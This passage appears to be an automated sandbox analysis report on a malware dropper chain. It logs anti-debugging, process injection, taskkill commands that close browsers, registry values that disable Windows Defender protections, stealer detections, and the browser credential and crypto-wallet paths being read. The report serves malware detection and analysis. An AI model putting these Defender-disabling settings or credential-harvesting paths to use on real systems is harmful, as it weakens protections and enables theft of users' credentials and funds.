Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04E00C7D rdtsc 0_2_04E00C7D
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_0043DF70 LdrInitializeThunk, 10_2_0043DF70
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 7_2_007CA464 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_007CA464
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 7_2_007BDD90 mov eax, dword ptr fs:[00000030h] 7_2_007BDD90
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 7_2_007E018D mov edi, dword ptr fs:[00000030h] 7_2_007E018D
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 7_2_007B9EF0 mov edi, dword ptr fs:[00000030h] 7_2_007B9EF0
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 9_2_007BDD90 mov eax, dword ptr fs:[00000030h] 9_2_007BDD90
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 9_2_007B9EF0 mov edi, dword ptr fs:[00000030h] 9_2_007B9EF0
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 7_2_007CEFB0 GetProcessHeap, 7_2_007CEFB0
Enables debug privileges
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 7_2_007CA464 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_007CA464
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 7_2_007CA458 SetUnhandledExceptionFilter, 7_2_007CA458
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 7_2_007CCDEA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_007CCDEA
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 7_2_007C9AF9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_007C9AF9
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 9_2_007CA464 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_007CA464
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 9_2_007CA458 SetUnhandledExceptionFilter, 9_2_007CA458
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 9_2_007CCDEA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_007CCDEA
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 9_2_007C9AF9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_007C9AF9
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: 3996dc7402.exe PID: 8144, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3996dc7402.exe PID: 4936, type: MEMORYSTR
Contains functionality to inject code into remote processes
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 7_2_007E018D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread, 7_2_007E018D
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Memory written: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe "C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe "C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe "C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe "C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe "C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe "C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Process created: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe "C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Process created: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe "C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Process created: unknown unknown
Uses taskkill to terminate processes
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: d986826e57.exe, 00000010.00000000.2782383899.0000000000602000.00000002.00000001.01000000.0000000D.sdmp, d986826e57.exe, 00000029.00000002.3003709713.0000000000602000.00000002.00000001.01000000.0000000D.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: 19cf1f0449.exe, 00000024.00000002.3051377100.0000000000EDD000.00000040.00000001.01000000.00000015.sdmp Binary or memory string: HiKProgram Manager
Source: skotes.exe, skotes.exe, 00000002.00000002.1797031968.0000000000E18000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: \Program Manager
Source: e5e907fecb.exe, 0000000D.00000002.2680948648.00000000005FF000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: QProgram Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 7_2_007CA220 cpuid 7_2_007CA220
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: unknown VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: unknown VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: unknown VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: unknown VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: unknown VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: unknown VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: unknown VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: unknown VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 7_2_007CA8E5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 7_2_007CA8E5
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Disable Windows Defender notifications (registry)
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
Disable Windows Defender real time protection (registry)
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1
Disables Windows Defender Tamper protection
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Registry value created: TamperProtection 0
Modifies windows update settings
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations
AV process strings found (often used to terminate AV products)
Source: r5mqFEC.exe, 0000000A.00000003.2662244591.0000000003239000.00000004.00000020.00020000.00000000.sdmp, r5mqFEC.exe, 0000000A.00000002.2666427560.0000000003239000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2982257579.0000000000ED3000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2982257579.0000000000E7A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 2.2.skotes.exe.c20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.skotes.exe.c20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000003.2313546363.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1753823043.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1756175985.00000000049E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1796955424.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1794588718.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1750360381.0000000000411000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1705192242.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Clipboard Hijacker
Source: Yara match File source: 0000000C.00000003.3933389019.0000000001726000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: a7f098a093.exe PID: 6104, type: MEMORYSTR
Yara detected Credential Flusher
Source: Yara match File source: 00000029.00000003.2996946073.000000000124F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2864753465.000000000150F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: d986826e57.exe PID: 6612, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: d986826e57.exe PID: 4556, type: MEMORYSTR
Yara detected Cryptbot
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0000000C.00000003.3257614525.00000000012E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: a7f098a093.exe PID: 6104, type: MEMORYSTR
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: r5mqFEC.exe PID: 7580, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: e5e907fecb.exe PID: 5012, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 0000000E.00000002.3218633907.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2718635332.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3207489291.0000000000481000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.2853261373.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.3320048411.000000000117B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.3310520507.0000000000481000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 3996dc7402.exe PID: 8144, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3996dc7402.exe PID: 4936, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Found many strings related to Crypto-Wallets (likely being stolen)
Source: r5mqFEC.exe, 0000000A.00000003.2525316848.00000000032B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: llets/Electrum-LTCIChvB5
Source: e5e907fecb.exe, 0000000F.00000003.2982257579.0000000000ED3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/ElectronCash
Source: r5mqFEC.exe String found in binary or memory: Jaxx Liberty
Source: e5e907fecb.exe, 0000000F.00000003.2982257579.0000000000ED3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: e5e907fecb.exe, 0000000F.00000003.2826165474.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 0},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/[
Source: r5mqFEC.exe, 0000000A.00000003.2562100051.00000000032A9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ExodusWeb3
Source: e5e907fecb.exe, 0000000F.00000003.2982257579.0000000000ED3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum
Source: r5mqFEC.exe String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: r5mqFEC.exe, 0000000A.00000003.2558891081.00000000032B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: e5e907fecb.exe, 0000000F.00000003.2826165474.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
